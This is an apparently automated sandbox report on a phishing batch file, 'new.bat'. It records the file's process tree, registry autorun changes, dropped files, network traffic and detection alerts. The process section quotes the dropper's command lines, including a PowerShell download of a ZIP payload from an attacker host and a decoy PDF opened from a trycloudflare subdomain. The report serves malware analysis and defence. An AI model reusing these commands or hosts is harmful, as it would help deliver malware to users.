File name: new.bat
Full analysis: https://app.any.run/tasks/dd506a97-8721-4c17-86de-5bd40fec5e3b
Verdict: Malicious activity
Analysis date: July 27, 2024, 21:05:33
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: phishing
MIME: text/plain
File info: Unicode text, UTF-16, little-endian text, with very long lines (14150), with no line terminators
MD5: 2BD3CD5D43151A3DA40C26AD7A63E150
SHA1: D6F881F60F447D3E14FD81E1CE1BC660A6E6DAA9
SHA256: 83126357A369AFD90C496CBB7D0081A8B5AE4AE43EA5E7DF582B93F241677BED
SSDEEP: 384:13c9iaKYfl4T2mQvOP3ieQ9UGd2jhnhgvX:9c9iaKYfl4qmQvOP3ieQ9UGd2jhnhgvX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • PHISHING has been detected (SURICATA)

      • msedge.exe (PID: 7300)
    • Drops the executable file immediately after the start

      • powershell.exe (PID: 6524)
    • Changes the autorun value in the registry

      • reg.exe (PID: 6396)
  • SUSPICIOUS

    • Application launched itself

      • Skype.exe (PID: 1340)
    • Uses REG/REGEDIT.EXE to modify registry

      • Skype.exe (PID: 1340)
    • Reads security settings of Internet Explorer

      • Skype.exe (PID: 1340)
    • Downloads file from URI

      • powershell.exe (PID: 1296)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 1896)
    • Detected use of alternative data streams (AltDS)

      • Skype.exe (PID: 1340)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 1296)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 6524)
    • Connects to unusual port

      • powershell.exe (PID: 1296)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6524)
    • Process drops python dynamic module

      • powershell.exe (PID: 6524)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1896)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1896)
  • INFO

    • Checks proxy server information

      • slui.exe (PID: 1584)
      • slui.exe (PID: 5900)
      • Skype.exe (PID: 1340)
      • powershell.exe (PID: 1296)
    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3688)
    • Reads the software policy settings

      • slui.exe (PID: 5900)
      • slui.exe (PID: 1584)
      • Skype.exe (PID: 1340)
    • Checks supported languages

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 2960)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)
      • Skype.exe (PID: 1780)
    • Reads Environment values

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
    • Creates files or folders in the user directory

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 1780)
    • Manual execution by a user

      • Skype.exe (PID: 1340)
      • cmd.exe (PID: 1896)
      • mspaint.exe (PID: 6476)
    • Reads the computer name

      • Skype.exe (PID: 1340)
      • Skype.exe (PID: 5672)
      • Skype.exe (PID: 1780)
      • Skype.exe (PID: 4288)
      • identity_helper.exe (PID: 8056)
      • Skype.exe (PID: 7848)
    • Reads CPU info

      • Skype.exe (PID: 1340)
    • Create files in a temporary directory

      • Skype.exe (PID: 1340)
    • Process checks computer location settings

      • Skype.exe (PID: 4288)
      • Skype.exe (PID: 968)
      • Skype.exe (PID: 1340)
    • Reads the machine GUID from the registry

      • Skype.exe (PID: 1340)
    • Application launched itself

      • msedge.exe (PID: 2396)
    • Disables trace logs

      • powershell.exe (PID: 1296)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6524)
    • Reads Microsoft Office registry keys

      • msedge.exe (PID: 2396)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.txt | Text - UTF-16 (LE) encoded (66.6)
.mp3 | MP3 audio (33.3)
No data.
All screenshots are available in the full report
Total processes: 194
Monitored processes: 60
Malicious processes: 4
Suspicious processes: 2

Behavior graph

start notepad.exe no specs slui.exe slui.exe skype.exe skype.exe no specs skype.exe no specs skype.exe reg.exe conhost.exe no specs skype.exe no specs reg.exe no specs conhost.exe no specs mspaint.exe no specs cmd.exe no specs conhost.exe no specs skype.exe no specs msedge.exe timeout.exe no specs powershell.exe msedge.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs #PHISHING msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs reg.exe no specs conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs powershell.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs skype.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
PID: 524
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=6560 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Edge
Exit code: 0
Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 968
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=renderer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --app-user-model-id=Microsoft.Skype.SkypeDesktop --app-path="C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar" --no-sandbox --no-zygote --enable-blink-features --disable-blink-features --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --ms-disable-indexeddb-transaction-timeout --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3992 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: Skype.exe
User: admin
Company: Skype Technologies S.A.
Integrity Level: MEDIUM
Description: Skype
Version: 8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1244
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=6088 --field-trial-handle=2140,i,780710321422131241,14987600190179687934,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge
Exit code: 0
Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1296
CMD: powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipnng.site:4727/DXJS.zip' -OutFile 'C:\Users\admin\Downloads\DXJS.zip' }"
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1340
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --share-file="C:\Users\admin\Desktop\new.bat.txt"
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: explorer.exe
User: admin
Company: Skype Technologies S.A.
Integrity Level: MEDIUM
Description: Skype
Version: 8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1584
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 1780
CMD: "C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop" --mojo-platform-channel-handle=2460 --field-trial-handle=2188,i,13424211680956666148,7091152924775151219,131072 --enable-features=WinUseBrowserSpellChecker,WinUseHybridSpellChecker,WinrtGeolocationImplementation --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
Parent process: Skype.exe
User: admin
Company: Skype Technologies S.A.
Integrity Level: MEDIUM
Description: Skype
Version: 8.104.0.207
Modules
Images
c:\program files (x86)\microsoft\skype for desktop\skype.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\acgenral.dll
PID: 1896
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\Desktop\new.bat.txt.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 2068
CMD: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Path: C:\Windows\System32\timeout.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: timeout - pauses command processing
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\timeout.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 2396
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vancouver-mats-describe-survival.trycloudflare.com/kyvbsa.pdf
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge
Version: 122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 34 513
Read events: 34 444
Write events: 50
Delete events: 19

Modification events

PID: 6396 | Process: reg.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Operation: write | Name: Skype for Desktop | Value: C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
PID: 1340 | Process: Skype.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries | Operation: delete value | Name: en-US | Value:
PID: 1340 | Process: Skype.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries | Operation: delete value | Name: en | Value:
PID: 1340 | Process: Skype.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling\Dictionaries | Operation: delete value | Name: _Global_ | Value:
PID: 1896 | Process: cmd.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer | Operation: write | Name: SlowContextMenuEntries | Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
PID: 1896 | Process: cmd.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value:
PID: 1896 | Process: cmd.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
PID: 1896 | Process: cmd.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | Operation: write | Name: CachePrefix | Value: Visited:
PID: 2396 | Process: msedge.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon | Operation: write | Name: failed_count | Value: 0
PID: 2396 | Process: msedge.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon | Operation: write | Name: state | Value: 2
Executable files: 45
Suspicious files: 106
Text files: 415
Unknown types: 0

Dropped files

PID
Process
Filename
Type
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Spelling\en-US\default.acl | Type: text
MD5: F3B25701FE362EC84616A93A45CE9998
SHA256: B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b916037c1e115fe0.customDestinations-ms | Type: binary
MD5: 8786405114010246400E95724DC017A4
SHA256: 0D6D2287D81B396EE757B7BEAA9F1931E7A462705CB6BFF6960174705A786587
PID: 4288 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.conf | Type: binary
MD5: 99914B932BD37A50B983C5E7C90AE93B
SHA256: 44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
PID: 4288 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\CS_shared.tmp | Type: binary
MD5: 99914B932BD37A50B983C5E7C90AE93B
SHA256: 44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\settings.json | Type: binary
MD5: 95D3A9F5B2C5989A3E6A174FB3E21820
SHA256: 5961A7DCBB98937F89DA58A47266F3E90DF340B8D255050312EB98356A006E70
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\js\index-dir\temp-index | Type: binary
MD5: 7BEACAAE406C2E60924CC1DF3D987E62
SHA256: 504047A53AC37ADE8A8BB443DFB309230526DD4B903508E902F251C271B36A61
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Crashpad\settings.dat | Type: binary
MD5: 9D0439A794AA96ABD6AFF504C86C7F31
SHA256: 5DBC3A5DAF431973E245D83AB51B128E9C4CC2F3ECD61C45C88DB161ACC25B7B
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\MANIFEST-000001 | Type: binary
MD5: 5AF87DFD673BA2115E2FCF5CFDB727AB
SHA256: F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Local Storage\leveldb\000001.dbtmp | Type: text
MD5: 46295CAC801E5D4857D09837238A6394
SHA256: 0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
PID: 1340 | Process: Skype.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Partitions\e3d3a04a-060a-498e-9818-86a5809f4d73\Code Cache\wasm\index-dir\the-real-index | Type: binary
MD5: AF6827A89A41716ADAA451C33277EE8A
SHA256: E7D89DF74701625E46DBAE8D74CC8FBA7829439059CDDBE4DB2F77343AB88892
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 51
TCP/UDP connections: 87
DNS requests: 57
Threats: 11

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
20.190.160.17:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=0&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
GET
40.126.32.133:443
https://login.live.com/oauth20_authorize.srf?app_version=8.104.0.207&client_flight=ReservedFlight33,suhs&client_id=00000000480BC46C&cobrandid=6e63daac-8dfe-43f6-b70e-deacb69a89d6&display=touch&fl=phone2&lw=1&mkt=en-US&nopa=2&psi=skype&uaid=94e693f5e0084e679df65d8922024a67&coa=1&scope=service::lw.skype.com::MBI_SSL&response_type=token&redirect_uri=https%3A%2F%2Flogin.live.com%2Foauth20_desktop.srf
unknown
GET
401
13.107.6.158:443
https://business.bing.com/api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox
unknown
OPTIONS
200
23.48.23.26:443
https://bzib.nelreports.net/api/report?cat=bingbusiness
unknown
1296
powershell.exe
GET
57.128.129.21:4727
http://trackmyshipnng.site:4727/DXJS.zip
unknown
unknown
GET
304
13.107.42.16:443
https://config.edge.skype.com/config/v1/Edge/122.0.2365.59?clientId=4489578223053569932&agents=EdgeRuntime%2CEdgeRuntimeConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=35&mngd=0&installdate=1661339457&edu=0&bphint=2&soobedate=1504771245&fg=1
unknown
GET
304
204.79.197.239:443
https://edge.microsoft.com/abusiveadblocking/api/v1/blocklist
unknown
POST
200
104.126.37.136:443
https://gateway.bingviz.microsoftapp.net/receive?app=skype
unknown
binary
15 b
POST
200
40.79.189.58:443
https://self.events.data.microsoft.com/OneCollector/1.0/
unknown
binary
9 b
GET
200
13.107.21.239:443
https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=122.0.2365.59&experimentationmode=2&scpguard=0&scpfull=0&scpver=0
unknown
binary
807 b

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
131.253.33.254:443
a-ring-fallback.msedge.net
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
3952
svchost.exe
239.255.255.250:1900
whitelisted
104.126.37.171:443
www.bing.com
Akamai International B.V.
DE
unknown
132
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2796
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6012
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6964
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2432
slui.exe
40.91.76.224:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
t-ring-fdv2.msedge.net
  • 13.107.237.254
unknown
a-ring-fallback.msedge.net
  • 131.253.33.254
unknown
www.bing.com
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.185.78
whitelisted
self.events.data.microsoft.com
  • 40.79.189.58
whitelisted
get.skype.com
  • 52.113.194.133
whitelisted
a.config.skype.com
  • 13.107.42.16
whitelisted
pipe.skype.com
  • 20.189.173.1
  • 20.189.173.11
whitelisted
b.config.skype.com
  • 13.107.42.16
whitelisted

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Potentially Bad Traffic
ET POLICY Observed DNS Query to Commonly Abused Cloudflare Domain (trycloudflare .com)
7300
msedge.exe
Possible Social Engineering Attempted
PHISHING [ANY.RUN] Cloudflare Domain Abuse for Phishing or OpenDir Purposes (RGDA)
1296
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potential Corporate Privacy Violation
ET CHAT Skype User-Agent detected
1 ETPRO signatures available at the full report
No debug info